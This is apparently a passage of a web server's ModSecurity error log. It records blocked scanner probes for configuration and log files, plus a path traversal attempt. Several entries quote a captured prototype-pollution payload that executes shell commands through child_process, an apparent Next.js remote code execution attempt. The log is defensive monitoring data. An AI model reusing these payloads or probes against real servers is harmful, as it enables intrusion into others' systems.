.conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/var/log/smtp.log"] [unique_id "abQ5tCR2JWhLCDdMx-ZJZAAAAUE"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:12.638223 2026] [:error] [pid 18273:tid 18366] [client 93.123.109.246:58284] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/mail.conf"] [unique_id "abQ5tP97mFO6WwsNdNrr1QAAAFU"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:12.638901 2026] [:error] [pid 18275:tid 18385] [client 93.123.109.246:58346] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/email.conf"] [unique_id "abQ5tIbIVNslGX0MLW_icAAAAJU"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:12.638931 2026] [:error] [pid 18273:tid 18338] [client 93.123.109.246:58330] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/email.log"] [unique_id "abQ5tP97mFO6WwsNdNrr1gAAAEE"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:12.639533 2026] [:error] [pid 18268:tid 18331] [client 93.123.109.246:58308] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/log/smtp.log"] [unique_id "abQ5tP2mRPM-PnGy3vl6wgAAABU"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:18.076974 2026] [:error] [pid 23521:tid 23568] [client 93.123.109.246:58358] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/var/log/email.log"] [unique_id "abQ5uilOeXKcdbjGtw57OAAAARU"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:30.188451 2026] [:error] [pid 18275:tid 18376] [client 93.123.109.246:9764] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/email.cfg"] [unique_id "abQ5xobIVNslGX0MLW_i5QAAAIw"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:30.190611 2026] [:error] [pid 18441:tid 18444] [client 93.123.109.246:9654] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/email.ini"] [unique_id "abQ5xpOXjLb10hm6AuAfIQAAAME"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:42.339689 2026] [:error] [pid 18441:tid 18457] [client 93.123.109.246:54418] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/smtp.log"] [unique_id "abQ50pOXjLb10hm6AuAfMAAAAM4"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:42.341371 2026] [:error] [pid 23521:tid 23568] [client 93.123.109.246:54378] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/mail.cfg"] [unique_id "abQ50ilOeXKcdbjGtw57WgAAARU"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:42.345725 2026] [:error] [pid 18441:tid 18466] [client 93.123.109.246:54482] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/smtp.ini"] [unique_id "abQ50pOXjLb10hm6AuAfMQAAANc"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:52.313558 2026] [:error] [pid 18275:tid 18387] [client 93.123.109.246:54450] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/logs/smtp.log"] [unique_id "abQ53IbIVNslGX0MLW_jhgAAAJc"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:52.314284 2026] [:error] [pid 18275:tid 18375] [client 93.123.109.246:54416] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/etc/email.conf"] [unique_id "abQ53IbIVNslGX0MLW_jhwAAAIs"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:23:32.796600 2026] [:error] [pid 5203:tid 5227] [client 93.123.109.246:48024] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.ebextensions/01-mail.config"] [unique_id "abQ6BCR2JWhLCDdMx-ZLTAAAAUU"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:23:42.549404 2026] [:error] [pid 18275:tid 18371] [client 93.123.109.246:48052] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.ebextensions/02-mail.config"] [unique_id "abQ6DobIVNslGX0MLW_kmwAAAIk"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:23:45.834010 2026] [:error] [pid 18441:tid 18446] [client 93.123.109.246:14288] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.ebextensions/03-mail.config"] [unique_id "abQ6EZOXjLb10hm6AuAfVAAAAMM"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:23:45.839342 2026] [:error] [pid 5203:tid 5227] [client 93.123.109.246:14312] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.ebextensions/mail.config"] [unique_id "abQ6ESR2JWhLCDdMx-ZLngAAAUU"], referer: http://www.cms-1.dev-unit.com/ [Sat Mar 14 11:26:30.863754 2026] [:error] [pid 14273:tid 14320] [client 13.233.71.119:37872] [client 13.233.71.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abUpxv2clTdPByjeT_M2DAAAAIc"] [Sat Mar 14 11:26:31.002524 2026] [:error] [pid 14273:tid 14351] [client 13.233.71.119:37872] [client 13.233.71.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abUpx_2clTdPByjeT_M2DgAAAJY"] [Sat Mar 14 11:26:31.148188 2026] [:error] [pid 14273:tid 14343] [client 13.233.71.119:37872] [client 13.233.71.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abUpx_2clTdPByjeT_M2DwAAAJI"] [Sat Mar 14 13:42:20.324548 2026] [:error] [pid 4409:tid 4417] [client 185.177.72.56:9052] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "abVJnODqGyPowfV1U2baxAAAAYY"] [Sat Mar 14 13:42:29.581757 2026] [:error] [pid 14272:tid 14328] [client 185.177.72.56:47648] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] 